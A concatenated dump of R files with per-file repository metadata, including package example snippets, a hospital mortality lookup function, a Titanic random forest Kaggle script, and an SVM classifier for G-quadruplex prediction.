show.tip.label = FALSE)
# get the last plot geometry
lastPP <- get("last_plot.phylo", envir = .PlotPhyloEnv)
# the original labels, and new (indexed) order of pedons in dendrogram
d.labels <- attr(d, 'Labels')
new_order <- sapply(1:lastPP$Ntip,
function(i)
which(as.integer(lastPP$xx[1:lastPP$Ntip]) == i))
# plot the profiles, in the ordering defined by the dendrogram
# with a couple fudge factors to make them fit
plotSPC(
sp3.grouped,
color = "soil_color",
plot.order = new_order,
y.offset = max(lastPP$yy) + 10,
width = 0.1,
cex.names = 0.5,
add = TRUE
)
}
}
\references{
http://casoilresource.lawr.ucdavis.edu/
}
\keyword{datasets}
|
library(pRSR)
### Name: GetFitHReg
### Title: Compute loglikelihood ratio test statistic
### Aliases: GetFitHReg
### Keywords: ts
### ** Examples
#Simple Examples
z<-SimulateHReg(10, f=2.5/10, 1, 2)
GetFitHReg(z)
t<-seq(2,20,2)
GetFitHReg(y=z, t=t)
GetFitHReg(z, nf=25)
| /data/genthat_extracted_code/pRSR/examples/GetFitHReg.Rd.R | no_license | surayaaramli/typeRrh | R | false | false | 277 | r | library(pRSR)
### Name: GetFitHReg
### Title: Compute loglikelihood ratio test statistic
### Aliases: GetFitHReg
### Keywords: ts
### ** Examples
#Simple Examples
z<-SimulateHReg(10, f=2.5/10, 1, 2)
GetFitHReg(z)
t<-seq(2,20,2)
GetFitHReg(y=z, t=t)
GetFitHReg(z, nf=25)
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/autoTreshold.R
\name{autoTreshold}
\alias{autoTreshold}
\title{Some BullShit}
\usage{
autoTreshold(
fn_df,
fn_marker,
fn_maxNOfEvents = 100,
fn_tol = 1e-05,
fn_expansion = 1,
fn_seed = 1234
)
}
\description{
Some BullShit
}
| /man/autoTreshold.Rd | no_license | luigidolcetti/RUNIMC | R | false | true | 314 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/autoTreshold.R
\name{autoTreshold}
\alias{autoTreshold}
\title{Some BullShit}
\usage{
autoTreshold(
fn_df,
fn_marker,
fn_maxNOfEvents = 100,
fn_tol = 1e-05,
fn_expansion = 1,
fn_seed = 1234
)
}
\description{
Some BullShit
}
|
library(GISTools)
### Name: North Arrow
### Title: Add a north arrow to a map
### Aliases: north.arrow
### ** Examples
# Read in map data for New Haven
data(newhaven)
# Plot census block boundaries
plot(blocks)
# Add a north arrow
north.arrow(534750,152000,miles2ft(0.5),col='cyan')
# ... and a title
title('New Haven (CT)')
| /data/genthat_extracted_code/GISTools/examples/north.arrow.Rd.R | no_license | surayaaramli/typeRrh | R | false | false | 332 | r | library(GISTools)
### Name: North Arrow
### Title: Add a north arrow to a map
### Aliases: north.arrow
### ** Examples
# Read in map data for New Haven
data(newhaven)
# Plot census block boundaries
plot(blocks)
# Add a north arrow
north.arrow(534750,152000,miles2ft(0.5),col='cyan')
# ... and a title
title('New Haven (CT)')
|
best<-function(state, outcome_from_user)
{
#state="NY"
#outcome="Hospital.30.Day.Death..Mortality..Rates.from.Heart.Attack"
# Lookup lowest 30 day mortality rate for that specified state in the last 30 days
# Error out request with incorrect state or outcome measures
# Output hospital with minimum values and use alphabetic order to break ties
if(!length(state.abb[state.abb==state])==1)
{
stop("invalid state")
}
library("dplyr")
outcome_file <-read.csv("./rprog-data-ProgAssignment3-data/outcome-of-care-measures.csv", colClasses = 'character')
column_list<-names(outcome_file)
hospital_30day_mortalitiy_columns<-column_list[grepl(pattern = "^Hospital.+30.Day.Death", column_list,ignore.case = TRUE)]
# print(outcome_from_user)
outcome_to_check<-gsub(" ", ".",outcome_from_user)
# print(outcome_to_check)
# print(hospital_30day_mortalitiy_columns)
outcome<-hospital_30day_mortalitiy_columns[grepl(pattern=outcome_to_check,hospital_30day_mortalitiy_columns, ignore.case = TRUE)]
print(length(outcome))
if(length(outcome)!=1)
{
stop("invalid outcome")
}
#head(outcome_file,1)
# print(outcome_file)
outcome_file[,outcome]<-as.numeric(outcome_file[,outcome])
#head(outcome_file,2)
complete_values<-outcome_file[complete.cases(outcome_file),c(outcome,"State","Hospital.Name")]
state_filtered_values<-complete_values[complete_values[,"State"]==state,]
#head(complete_values[complete_values$State==state,c(outcome,"State","Hospital.Name")])
rows_with_min_outcome_values<-state_filtered_values[state_filtered_values[,outcome]==min(state_filtered_values[,outcome]),]
rows_with_min_outcome_values[rows_with_min_outcome_values[,"Hospital.Name"]==min(rows_with_min_outcome_values[,"Hospital.Name"]),]
rows_with_min_outcome_values[,"Hospital.Name"]
} | /RProgramming/week4.R | no_license | hirenpatelatl/datasciencecoursera | R | false | false | 1,860 | r |
best<-function(state, outcome_from_user)
{
#state="NY"
#outcome="Hospital.30.Day.Death..Mortality..Rates.from.Heart.Attack"
# Lookup lowest 30 day mortality rate for that specified state in the last 30 days
# Error out request with incorrect state or outcome measures
# Output hospital with minimum values and use alphabetic order to break ties
if(!length(state.abb[state.abb==state])==1)
{
stop("invalid state")
}
library("dplyr")
outcome_file <-read.csv("./rprog-data-ProgAssignment3-data/outcome-of-care-measures.csv", colClasses = 'character')
column_list<-names(outcome_file)
hospital_30day_mortalitiy_columns<-column_list[grepl(pattern = "^Hospital.+30.Day.Death", column_list,ignore.case = TRUE)]
# print(outcome_from_user)
outcome_to_check<-gsub(" ", ".",outcome_from_user)
# print(outcome_to_check)
# print(hospital_30day_mortalitiy_columns)
outcome<-hospital_30day_mortalitiy_columns[grepl(pattern=outcome_to_check,hospital_30day_mortalitiy_columns, ignore.case = TRUE)]
print(length(outcome))
if(length(outcome)!=1)
{
stop("invalid outcome")
}
#head(outcome_file,1)
# print(outcome_file)
outcome_file[,outcome]<-as.numeric(outcome_file[,outcome])
#head(outcome_file,2)
complete_values<-outcome_file[complete.cases(outcome_file),c(outcome,"State","Hospital.Name")]
state_filtered_values<-complete_values[complete_values[,"State"]==state,]
#head(complete_values[complete_values$State==state,c(outcome,"State","Hospital.Name")])
rows_with_min_outcome_values<-state_filtered_values[state_filtered_values[,outcome]==min(state_filtered_values[,outcome]),]
rows_with_min_outcome_values[rows_with_min_outcome_values[,"Hospital.Name"]==min(rows_with_min_outcome_values[,"Hospital.Name"]),]
rows_with_min_outcome_values[,"Hospital.Name"]
} |
# -----------------------
# Setting
library(tree)
require(maptree)
library(randomForest)
setwd("/Users/aszostek/Projects/Kaggle/Titanic")
source("./Utils/submission_utils.R")
iteration = 8
# -----------------------
# Read Data
train.org <- read.csv(file="./Data/train.csv")
test.org <- read.csv(file="./Data/test.csv")
# -----------------------
# Data transoformations and feature creation
# Function getting the last name of passanger
getlastname<-function(name)
{
lname<-sub(",.*$","",name)
return(lname)
}
# Function to get the title of the passanger
gettitle<-function(name)
{
lname<-sub("^.*, ","",name)
lname<-sub("\\. .*$","",lname)
return(lname)
}
# Function which calculates an age for a given title Mr, Miss etc
# It uses information from both training and test set
# This function operates on original training set and test set!
age_title<-function()
{
# take original data
tr1<-train.org
te1<-test.org
# add survivor column to test set
te1<-cbind(factor(sample(c(0,1),nrow(te1),replace=T),levels=c(0,1)),te1)
names(te1)[[1]]<-"survived"
# Combine two tables togethe
all<-rbind(tr1,te1)
# select only samples with age provided
all<-all[!is.na(all$age),]
# Extract only Mr, Miss. etc
lname<-as.character(all[[3]])
lname<-sub("^.*, ","",lname)
lname<-sub("\\. .*$","",lname)
all$title<-as.factor(lname)
all<-all[,c("age","title","pclass")]
all$pclass <- as.factor(all$pclass)
fit <- lm(age ~ title+pclass,data=all)
return(fit)
}
guess.age<-function(passanger)
{
return(predict(age_title(),newdata=passanger)[[1]])
}
data.transformation<-function(data)
{
# If embarked missing fill with most frequent option which is S
data[data$embarked=="","embarked"]<-"S"
# calculate title of the passanger
data$title <- unlist(lapply(as.character(data$name),function(x) gettitle(x)))
# calculate last name
data$lname <- unlist(lapply(as.character(data$name),function(x) getlastname(x)))
# calculate family on board
data$family <- data$sibsp+data$parch+1
# Clean classes of each column
if(names(data)[[1]]=="survived") data$survived<-as.factor(data$survived)
data$pclass<-as.factor(data$pclass)
data$name<-as.character(data$name)
data$ticket<-as.character(data$ticket)
data$cabin<-as.character(data$cabin)
data$embarked<-as.factor(as.character(data$embarked))
data$title<-as.factor(as.character(data$title))
# If it is a test set and doesn't have a survived column add one with fake data
# it is useful to have the same number of columns in training and test set
if(names(data)[[1]]!="survived")
{
data<-cbind(factor(sample(c(0,1),nrow(data),replace=T),levels=c(0,1)),data)
names(data)[[1]]<-"survived"
}
# Fill in missing age
# This function guesses age based on the title of the passange
for(i in 1:nrow(data))
{
if (is.na(data[i,"age"]))
data[i,"age"]<-guess.age(data[i,])
}
return(data[,c(-3,-8,-9,-10,-12)])
}
train <- data.transformation(train.org)
test <- data.transformation(test.org)
# -----------------------
# Modeling
# Train classification tree on a training set
t1<-randomForest(survived~.,data=train,mtry=4,ntree=200)
modelacc(train,t1)
# ------------------------
# Cross Validate
kfold.rf<-function(data,k)
{
n<-as.integer(nrow(data)/k)
err.vect<-rep(NA,k)
for (i in 1:k)
{
subset<-((i-1)*n+1):(i*n)
train<-data[-subset,]
test<-data[subset,]
forestpred<-randomForest(survived~.,data=train)
err<-sum(test[[1]]==predict(forestpred,newdata=test,type="class"))/nrow(test)
err.vect[i]<-err
}
return(err.vect)
}
leavoneout.rf<-function(data)
{
err.vect<-rep(NA,nrow(data))
for (i in 1:nrow(data))
{
train<-data[c(-i),]
test<-data[i,]
forestpred<-randomForest(survived~.,data=train)
err<-sum(test[[1]]==predict(forestpred,newdata=test,type="class"))/nrow(test)
err.vect[i]<-err
}
return(err.vect)
}
a<-kfold.rf(train,10)
a
mean(a)
# -----------------------
# Submission file
submission = predict(t1,newdata=test,type="class")
test_submission = test
test_submission[[1]] <- submission
# write file
submission_file_name = paste("./Submissions/submission",as.character(iteration),".csv",sep="")
submission_file_name
write.csv(test_submission,file=submission_file_name,row.names=FALSE)
diffsub(7,8)
#########
# Tests
rbind(test[test$lname=="Palsson",],train[train$lname=="Palsson",])
rbind(test[test$lname=="Rice",],train[train$lname=="Rice",])
rbind(test[test$lname=="Fortune",],train[train$lname=="Fortune",])
rbind(test[test$lname=="Panula",],train[train$lname=="Panula",])
rbind(test[test$lname=="Sage",],train[train$lname=="Sage",])
| /Code/Titanic_iteration8.R | no_license | astronerma/Titanic | R | false | false | 4,718 | r | # -----------------------
# Setting
library(tree)
require(maptree)
library(randomForest)
setwd("/Users/aszostek/Projects/Kaggle/Titanic")
source("./Utils/submission_utils.R")
iteration = 8
# -----------------------
# Read Data
train.org <- read.csv(file="./Data/train.csv")
test.org <- read.csv(file="./Data/test.csv")
# -----------------------
# Data transoformations and feature creation
# Function getting the last name of passanger
getlastname<-function(name)
{
lname<-sub(",.*$","",name)
return(lname)
}
# Function to get the title of the passanger
gettitle<-function(name)
{
lname<-sub("^.*, ","",name)
lname<-sub("\\. .*$","",lname)
return(lname)
}
# Function which calculates an age for a given title Mr, Miss etc
# It uses information from both training and test set
# This function operates on original training set and test set!
age_title<-function()
{
# take original data
tr1<-train.org
te1<-test.org
# add survivor column to test set
te1<-cbind(factor(sample(c(0,1),nrow(te1),replace=T),levels=c(0,1)),te1)
names(te1)[[1]]<-"survived"
# Combine two tables togethe
all<-rbind(tr1,te1)
# select only samples with age provided
all<-all[!is.na(all$age),]
# Extract only Mr, Miss. etc
lname<-as.character(all[[3]])
lname<-sub("^.*, ","",lname)
lname<-sub("\\. .*$","",lname)
all$title<-as.factor(lname)
all<-all[,c("age","title","pclass")]
all$pclass <- as.factor(all$pclass)
fit <- lm(age ~ title+pclass,data=all)
return(fit)
}
guess.age<-function(passanger)
{
return(predict(age_title(),newdata=passanger)[[1]])
}
data.transformation<-function(data)
{
# If embarked missing fill with most frequent option which is S
data[data$embarked=="","embarked"]<-"S"
# calculate title of the passanger
data$title <- unlist(lapply(as.character(data$name),function(x) gettitle(x)))
# calculate last name
data$lname <- unlist(lapply(as.character(data$name),function(x) getlastname(x)))
# calculate family on board
data$family <- data$sibsp+data$parch+1
# Clean classes of each column
if(names(data)[[1]]=="survived") data$survived<-as.factor(data$survived)
data$pclass<-as.factor(data$pclass)
data$name<-as.character(data$name)
data$ticket<-as.character(data$ticket)
data$cabin<-as.character(data$cabin)
data$embarked<-as.factor(as.character(data$embarked))
data$title<-as.factor(as.character(data$title))
# If it is a test set and doesn't have a survived column add one with fake data
# it is useful to have the same number of columns in training and test set
if(names(data)[[1]]!="survived")
{
data<-cbind(factor(sample(c(0,1),nrow(data),replace=T),levels=c(0,1)),data)
names(data)[[1]]<-"survived"
}
# Fill in missing age
# This function guesses age based on the title of the passange
for(i in 1:nrow(data))
{
if (is.na(data[i,"age"]))
data[i,"age"]<-guess.age(data[i,])
}
return(data[,c(-3,-8,-9,-10,-12)])
}
train <- data.transformation(train.org)
test <- data.transformation(test.org)
# -----------------------
# Modeling
# Train classification tree on a training set
t1<-randomForest(survived~.,data=train,mtry=4,ntree=200)
modelacc(train,t1)
# ------------------------
# Cross Validate
kfold.rf<-function(data,k)
{
n<-as.integer(nrow(data)/k)
err.vect<-rep(NA,k)
for (i in 1:k)
{
subset<-((i-1)*n+1):(i*n)
train<-data[-subset,]
test<-data[subset,]
forestpred<-randomForest(survived~.,data=train)
err<-sum(test[[1]]==predict(forestpred,newdata=test,type="class"))/nrow(test)
err.vect[i]<-err
}
return(err.vect)
}
leavoneout.rf<-function(data)
{
err.vect<-rep(NA,nrow(data))
for (i in 1:nrow(data))
{
train<-data[c(-i),]
test<-data[i,]
forestpred<-randomForest(survived~.,data=train)
err<-sum(test[[1]]==predict(forestpred,newdata=test,type="class"))/nrow(test)
err.vect[i]<-err
}
return(err.vect)
}
a<-kfold.rf(train,10)
a
mean(a)
# -----------------------
# Submission file
submission = predict(t1,newdata=test,type="class")
test_submission = test
test_submission[[1]] <- submission
# write file
submission_file_name = paste("./Submissions/submission",as.character(iteration),".csv",sep="")
submission_file_name
write.csv(test_submission,file=submission_file_name,row.names=FALSE)
diffsub(7,8)
#########
# Tests
rbind(test[test$lname=="Palsson",],train[train$lname=="Palsson",])
rbind(test[test$lname=="Rice",],train[train$lname=="Rice",])
rbind(test[test$lname=="Fortune",],train[train$lname=="Fortune",])
rbind(test[test$lname=="Panula",],train[train$lname=="Panula",])
rbind(test[test$lname=="Sage",],train[train$lname=="Sage",])
|
library(e1071)
library(caTools)
library(caret)
library(stats)
library(useful)
library(plyr)
library(doMC)
library(pROC)
library(data.table)
# global options
registerDoMC(detectCores()/2)
getDoParWorkers()
setwd("/home/cjls4/feature_vectors/")
#import data
load("collapsed_g4_positive.RData")
load("collapsed_g4_negative.RData")
load("test_collapsed_g4_positive.RData")
load("test_collapsed_g4_negative.RData")
#merge the +/- training sets
train_g4 <- rbind(collapsed_g4_positive, collapsed_g4_negative)
remove(collapsed_g4_positive)
remove(collapsed_g4_negative)
#merge the +/- test sets
test_g4 <-rbind(test_collapsed_g4_positive, test_collapsed_g4_negative)
remove(test_collapsed_g4_positive)
remove(test_collapsed_g4_negative)
##### radial kernel function #####
svmRadialE1071 <- list(
label = "Support Vector Machines with Radial Kernel - e1071",
library = "e1071",
type = c("Regression", "Classification"),
parameters = data.frame(parameter="cost",
class="numeric",
label="Cost"),
grid = function (x, y, len = NULL, search = "grid")
{
if (search == "grid") {
out <- expand.grid(cost = 2^((1:len) - 3))
}
else {
out <- data.frame(cost = 2^runif(len, min = -5, max = 10))
}
out
},
loop=NULL,
fit=function (x, y, wts, param, lev, last, classProbs, ...)
{
if (any(names(list(...)) == "probability") | is.numeric(y)) {
out <- e1071::svm(x = as.matrix(x), y = y, kernel = "radial",
cost = param$cost, ...)
}
else {
out <- e1071::svm(x = as.matrix(x), y = y, kernel = "radial",
cost = param$cost, probability = classProbs, ...)
}
out
},
predict = function (modelFit, newdata, submodels = NULL)
{
predict(modelFit, newdata)
},
prob = function (modelFit, newdata, submodels = NULL)
{
out <- predict(modelFit, newdata, probability = TRUE)
attr(out, "probabilities")
},
predictors = function (x, ...)
{
out <- if (!is.null(x$terms))
predictors.terms(x$terms)
else x$xNames
if (is.null(out))
out <- names(attr(x, "scaling")$x.scale$`scaled:center`)
if (is.null(out))
out <- NA
out
},
tags = c("Kernel Methods", "Support Vector Machines", "Regression", "Classifier", "Robust Methods"),
levels = function(x) x$levels,
sort = function(x)
{
x[order(x$cost), ]
}
)
#seperate G4 from the predictors
seg_train_g4 <- train_g4[,1:19]
seg_test_g4 <- test_g4[,1:19]
#preprocessing
transformations <- preProcess(train_g4,
method=c("YeoJohnson", "center", "scale", "corr"),
cutoff=0.75)
training_set <- predict(transformations, train_g4)
table(training_set[,20])
table(train_g4[,20])
class(training_set[,20])
training_set$G4 <- as.numeric(training_set$G4)
training_set$G4 <- as.factor(training_set$G4)
training_set$G4 <- as.numeric(training_set$G4)
training_set$G4 <- as.factor(training_set$G4) #yes this is convoluted, but it gets the job done
training_set$G4 <- revalue(training_set$G4, c("1"="A", "2"= "B"))
test_set <- predict(transformations, test_g4)
test_set$G4 <- as.numeric(test_set$G4)
test_set$G4 <- as.factor(test_set$G4)
test_set$G4 <- as.numeric(test_set$G4)
test_set$G4 <- as.factor(test_set$G4) #yes this is convoluted, but it gets the job done
test_set$G4 <- revalue(test_set$G4, c("1"="A", "2"= "B"))
#model cross-validation and tuning
set.seed(42)
seeds <- vector(mode = "list", length = 26)
for(i in 1:25) seeds[[i]] <- sample.int(1000, 9)
seeds[[26]] <- sample.int(1000,1)
# setting cross validation method, trying to tune cost
cvCtrl_probs <- trainControl(method = "repeatedcv",
repeats = 5,
number = 5,
summaryFunction = twoClassSummary,
classProbs = TRUE,
seeds=seeds)
cvCtrl <- trainControl(method = "repeatedcv",
repeats = 5,
number = 5,
summaryFunction = twoClassSummary,
classProbs = TRUE,
seeds=seeds)
# training data
svmTune <- train(x = training_set[,1:19],
y = training_set$G4,
method = svmRadialE1071,
tuneLength = 9,
metric = "ROC",
trControl = cvCtrl)
probs_svm <- train(x = training_set[,1:19],
y = training_set$G4,
method = svmRadialE1071,
tuneLength = 1,
metric = "ROC",
trControl = cvCtrl_probs,
probability = TRUE)
save(svmTune, file = "svmTune.RData")
save(probs_svm, file = "probs_svm.RData")
svmTune
svmTune$finalModel
plot(svmTune, metric = "ROC", scales = list(x = list(log =2)))
svmPred <- predict(svmTune, test_set[,1:19])
confusionMatrix(svmPred, as.factor(test_set$G4))
# Accuracy : 0.785
# 95% CI : (0.769, 0.8003)
# No Information Rate : 0.7772
# P-Value [Acc > NIR] : 0.1717
##### plot fun things #####
gridSize <- 150
v1limits <- c(min(test_set$R_loops),max(test_set$R_loops))
tmpV1 <- seq(v1limits[1],v1limits[2],len=gridSize)
v2limits <- c(min(test_set$GC), max(test_set$GC))
tmpV2 <- seq(v2limits[1],v2limits[2],len=gridSize)
xgrid <- expand.grid(tmpV1,tmpV2)
names(xgrid) <- names(training_set)[c(13, 19)]
V3 <- as.numeric(predict(svmTune, xgrid))
V3 <- predict(svmTune, xgrid)
xgrid <- cbind(xgrid, V3)
point_shapes <- c(15,17)
point_colours <- brewer.pal(3,"Dark2")
point_size = 2
trainClassNumeric <- ifelse(moonsTrain$V3=="A", 1, 2)
testClassNumeric <- ifelse(moonsTest$V3=="A", 1, 2)
ggplot(xgrid, aes(V1,V2)) +
geom_point(col=point_colours[V3], shape=16, size=0.3) +
geom_point(data=moonsTrain, aes(V1,V2), col=point_colours[trainClassNumeric],
shape=point_shapes[trainClassNumeric], size=point_size) +
geom_contour(data=xgrid, aes(x=V1, y=V2, z=V3), breaks=1.5, col="grey30") +
ggtitle("train") +
theme_bw() +
theme(plot.title = element_text(size=25, face="bold"), axis.text=element_text(size=15),
axis.title=element_text(size=20,face="bold"))
ggplot(xgrid, aes(V1,V2)) +
geom_point(col=point_colours[V3], shape=16, size=0.3) +
geom_point(data=moonsTest, aes(V1,V2), col=point_colours[testClassNumeric],
shape=point_shapes[testClassNumeric], size=point_size) +
geom_contour(data=xgrid, aes(x=V1, y=V2, z=V3), breaks=1.5, col="grey30") +
ggtitle("test") +
theme_bw() +
theme(plot.title = element_text(size=25, face="bold"), axis.text=element_text(size=15),
axis.title=element_text(size=20,face="bold"))
# might need to do dimension reduction etc. to visualise what is going on lol
#oh well. Here's another SVM
training_set[,1:4] = scale(training_set[,1:4])
test_set[,1:4] = scale(test_set[,1:4])
classifier1 = svm(formula = G4~., data = training_set, type = 'C-classification', kernel = 'radial')
classifier2 = svm(formula = G4~ R_loops + GC, data = training_set, type = 'C-classification', kernel = 'radial')
test_pred1 = predict(classifier1, type = 'response', newdata = test_set[,-20])
test_pred2 = predict(classifier2, type = 'response', newdata = test_set[,-20])
# Making Confusion Matrix
cm1 = base::table(unlist(test_set[,20]), test_pred1)
cm2 = table(unlist(test_set[,20]), test_pred2)
cm1 # Confusion Matrix for all parameters
cm2 # Confusion Matrix for parameters being R loops and GsC content
svmPred <- predict(svmTune, test_set[,1:19])
confusionMatrix(test_pred1, as.factor(test_set$G4))
confusionMatrix(test_pred2, as.factor(test_set$G4))
confusionMatrix(test_pred3, as.factor(test_set$G4))
# The accuracy for both model looks solid...
m2 <- svm(Species~., data = iris)
plot(m2, iris, Petal.Width ~ Petal.Length,
slice = list(Sepal.Width = 3, Sepal.Length = 4))
plot(classifier1, training_set, R_loops ~ GC)
plot(classifier2, training_set, R_loops ~ GC)
iris.part = subset(iris, Species != 'setosa')
iris.part$Species = factor(iris.part$Species)
#iris.part = iris.part[, c(1,2,5)]
svm.fit = svm(formula=Species~., data=iris.part, type='C-classification', kernel='linear')
plot(svm.fit, iris.part, Petal.Width ~ Petal.Length, slice = list(Sepal.Width = 3, Sepal.Length = 4))
##### top 100 G4 scores #####
# get all the predicted scores, then get the top 100, and find it's equivalent expression score
load("svmTune.RData")
load("probs_svm.RData")
varImp(object = svmTune)
roc_svm_test <- roc(response = test_set$G4, predictor =as.numeric(svmPred))
plot(roc_svm_test)
plot(varImp(svmTune), col = viridis(19, direction = 1))
#simple_svm <- svm(x = training_set[,1:19],
# y = training_set$G4,
# kernel = "radial",
# cost = 0.25,
# cross = 5,
# probability = TRUE)
svmTune$finalModel
#pretty sure "B" is G4 positive
all_preds_svm <- predict.train(svmTune, type = "prob")
svmPred <- predict(svmTune, test_set[,1:19], type = "prob")
total_preds <- rbind(all_preds_svm, svmPred)
top_100_preds_svm <- S4Vectors::tail(as.data.table(sort(total_preds$B , decreasing = F, index.return = T)), 100)
load("min_g4_positive_names_train.RData")
load("min_g4_negative_names_train.RData")
load("plus_g4_positive_names_train.RData")
load("plus_g4_negative_names_train.RData")
load("min_g4_positive_names_test.RData")
load("min_g4_negative_names_test.RData")
load("plus_g4_positive_names_test.RData")
load("plus_g4_negative_names_test.RData")
x_names <- rbind(min_g4_positive_names_train, min_g4_negative_names_train,
plus_g4_positive_names_train, plus_g4_negative_names_train,
min_g4_positive_names_test, min_g4_negative_names_test,
plus_g4_positive_names_test, plus_g4_negative_names_test)
top_100_names_svm <- x_names[top_100_preds_svm$ix]
save(top_100_names_svm, file = "top_100_names_svm.RData")
| /Code/SVM_1.R | no_license | caroljlsun/sysbiol_pt3 | R | false | false | 10,045 | r |
library(e1071)
library(caTools)
library(caret)
library(stats)
library(useful)
library(plyr)
library(doMC)
library(pROC)
library(data.table)
# global options
registerDoMC(detectCores()/2)
getDoParWorkers()
setwd("/home/cjls4/feature_vectors/")
#import data
load("collapsed_g4_positive.RData")
load("collapsed_g4_negative.RData")
load("test_collapsed_g4_positive.RData")
load("test_collapsed_g4_negative.RData")
#merge the +/- training sets
train_g4 <- rbind(collapsed_g4_positive, collapsed_g4_negative)
remove(collapsed_g4_positive)
remove(collapsed_g4_negative)
#merge the +/- test sets
test_g4 <-rbind(test_collapsed_g4_positive, test_collapsed_g4_negative)
remove(test_collapsed_g4_positive)
remove(test_collapsed_g4_negative)
##### radial kernel function #####
svmRadialE1071 <- list(
label = "Support Vector Machines with Radial Kernel - e1071",
library = "e1071",
type = c("Regression", "Classification"),
parameters = data.frame(parameter="cost",
class="numeric",
label="Cost"),
grid = function (x, y, len = NULL, search = "grid")
{
if (search == "grid") {
out <- expand.grid(cost = 2^((1:len) - 3))
}
else {
out <- data.frame(cost = 2^runif(len, min = -5, max = 10))
}
out
},
loop=NULL,
fit=function (x, y, wts, param, lev, last, classProbs, ...)
{
if (any(names(list(...)) == "probability") | is.numeric(y)) {
out <- e1071::svm(x = as.matrix(x), y = y, kernel = "radial",
cost = param$cost, ...)
}
else {
out <- e1071::svm(x = as.matrix(x), y = y, kernel = "radial",
cost = param$cost, probability = classProbs, ...)
}
out
},
predict = function (modelFit, newdata, submodels = NULL)
{
predict(modelFit, newdata)
},
prob = function (modelFit, newdata, submodels = NULL)
{
out <- predict(modelFit, newdata, probability = TRUE)
attr(out, "probabilities")
},
predictors = function (x, ...)
{
out <- if (!is.null(x$terms))
predictors.terms(x$terms)
else x$xNames
if (is.null(out))
out <- names(attr(x, "scaling")$x.scale$`scaled:center`)
if (is.null(out))
out <- NA
out
},
tags = c("Kernel Methods", "Support Vector Machines", "Regression", "Classifier", "Robust Methods"),
levels = function(x) x$levels,
sort = function(x)
{
x[order(x$cost), ]
}
)
#seperate G4 from the predictors
seg_train_g4 <- train_g4[,1:19]
seg_test_g4 <- test_g4[,1:19]
#preprocessing
transformations <- preProcess(train_g4,
method=c("YeoJohnson", "center", "scale", "corr"),
cutoff=0.75)
training_set <- predict(transformations, train_g4)
table(training_set[,20])
table(train_g4[,20])
class(training_set[,20])
training_set$G4 <- as.numeric(training_set$G4)
training_set$G4 <- as.factor(training_set$G4)
training_set$G4 <- as.numeric(training_set$G4)
training_set$G4 <- as.factor(training_set$G4) #yes this is convoluted, but it gets the job done
training_set$G4 <- revalue(training_set$G4, c("1"="A", "2"= "B"))
test_set <- predict(transformations, test_g4)
test_set$G4 <- as.numeric(test_set$G4)
test_set$G4 <- as.factor(test_set$G4)
test_set$G4 <- as.numeric(test_set$G4)
test_set$G4 <- as.factor(test_set$G4) #yes this is convoluted, but it gets the job done
test_set$G4 <- revalue(test_set$G4, c("1"="A", "2"= "B"))
#model cross-validation and tuning
set.seed(42)
seeds <- vector(mode = "list", length = 26)
for(i in 1:25) seeds[[i]] <- sample.int(1000, 9)
seeds[[26]] <- sample.int(1000,1)
# setting cross validation method, trying to tune cost
cvCtrl_probs <- trainControl(method = "repeatedcv",
repeats = 5,
number = 5,
summaryFunction = twoClassSummary,
classProbs = TRUE,
seeds=seeds)
cvCtrl <- trainControl(method = "repeatedcv",
repeats = 5,
number = 5,
summaryFunction = twoClassSummary,
classProbs = TRUE,
seeds=seeds)
# training data
svmTune <- train(x = training_set[,1:19],
y = training_set$G4,
method = svmRadialE1071,
tuneLength = 9,
metric = "ROC",
trControl = cvCtrl)
probs_svm <- train(x = training_set[,1:19],
y = training_set$G4,
method = svmRadialE1071,
tuneLength = 1,
metric = "ROC",
trControl = cvCtrl_probs,
probability = TRUE)
save(svmTune, file = "svmTune.RData")
save(probs_svm, file = "probs_svm.RData")
svmTune
svmTune$finalModel
plot(svmTune, metric = "ROC", scales = list(x = list(log =2)))
svmPred <- predict(svmTune, test_set[,1:19])
confusionMatrix(svmPred, as.factor(test_set$G4))
# Accuracy : 0.785
# 95% CI : (0.769, 0.8003)
# No Information Rate : 0.7772
# P-Value [Acc > NIR] : 0.1717
##### plot fun things #####
gridSize <- 150
v1limits <- c(min(test_set$R_loops),max(test_set$R_loops))
tmpV1 <- seq(v1limits[1],v1limits[2],len=gridSize)
v2limits <- c(min(test_set$GC), max(test_set$GC))
tmpV2 <- seq(v2limits[1],v2limits[2],len=gridSize)
xgrid <- expand.grid(tmpV1,tmpV2)
names(xgrid) <- names(training_set)[c(13, 19)]
V3 <- as.numeric(predict(svmTune, xgrid))
V3 <- predict(svmTune, xgrid)
xgrid <- cbind(xgrid, V3)
point_shapes <- c(15,17)
point_colours <- brewer.pal(3,"Dark2")
point_size = 2
trainClassNumeric <- ifelse(moonsTrain$V3=="A", 1, 2)
testClassNumeric <- ifelse(moonsTest$V3=="A", 1, 2)
ggplot(xgrid, aes(V1,V2)) +
geom_point(col=point_colours[V3], shape=16, size=0.3) +
geom_point(data=moonsTrain, aes(V1,V2), col=point_colours[trainClassNumeric],
shape=point_shapes[trainClassNumeric], size=point_size) +
geom_contour(data=xgrid, aes(x=V1, y=V2, z=V3), breaks=1.5, col="grey30") +
ggtitle("train") +
theme_bw() +
theme(plot.title = element_text(size=25, face="bold"), axis.text=element_text(size=15),
axis.title=element_text(size=20,face="bold"))
ggplot(xgrid, aes(V1,V2)) +
geom_point(col=point_colours[V3], shape=16, size=0.3) +
geom_point(data=moonsTest, aes(V1,V2), col=point_colours[testClassNumeric],
shape=point_shapes[testClassNumeric], size=point_size) +
geom_contour(data=xgrid, aes(x=V1, y=V2, z=V3), breaks=1.5, col="grey30") +
ggtitle("test") +
theme_bw() +
theme(plot.title = element_text(size=25, face="bold"), axis.text=element_text(size=15),
axis.title=element_text(size=20,face="bold"))
# might need to do dimension reduction etc. to visualise what is going on lol
#oh well. Here's another SVM
training_set[,1:4] = scale(training_set[,1:4])
test_set[,1:4] = scale(test_set[,1:4])
classifier1 = svm(formula = G4~., data = training_set, type = 'C-classification', kernel = 'radial')
classifier2 = svm(formula = G4~ R_loops + GC, data = training_set, type = 'C-classification', kernel = 'radial')
test_pred1 = predict(classifier1, type = 'response', newdata = test_set[,-20])
test_pred2 = predict(classifier2, type = 'response', newdata = test_set[,-20])
# Making Confusion Matrix
cm1 = base::table(unlist(test_set[,20]), test_pred1)
cm2 = table(unlist(test_set[,20]), test_pred2)
cm1 # Confusion Matrix for all parameters
cm2 # Confusion Matrix for parameters being R loops and GsC content
svmPred <- predict(svmTune, test_set[,1:19])
